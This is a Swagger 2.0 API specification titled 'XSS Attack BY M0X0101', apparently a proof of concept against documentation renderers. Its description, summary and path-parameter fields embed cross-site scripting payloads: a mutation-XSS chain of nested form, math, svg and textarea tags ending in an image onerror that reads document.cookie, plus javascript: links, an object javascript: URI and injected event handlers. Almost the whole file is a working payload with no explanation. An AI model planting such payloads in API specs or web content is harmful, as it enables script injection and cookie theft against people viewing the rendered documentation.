swagger: '2.0'
info:
  title: XSS Attack BY M0X0101
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.cookie) src=1>"></form>
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /M0X0101:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - M0X0101_XSS_D
      operationId: findAccounts
      summary: Finds all accounts <h1>hh <img src=8 onchange=test><a href=javascript:alert(8)>a7</a> <a href=goog.com>ggg</a>
  '/hack/hachid/{id}':
    delete:
      parameters:
        - description: |
            ><h1>hacked<img src="tes" ontouchmove="prompet(8)"/><object data="javascript:alert(8)">  <form action="post"><input value="name"></form>
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: no res
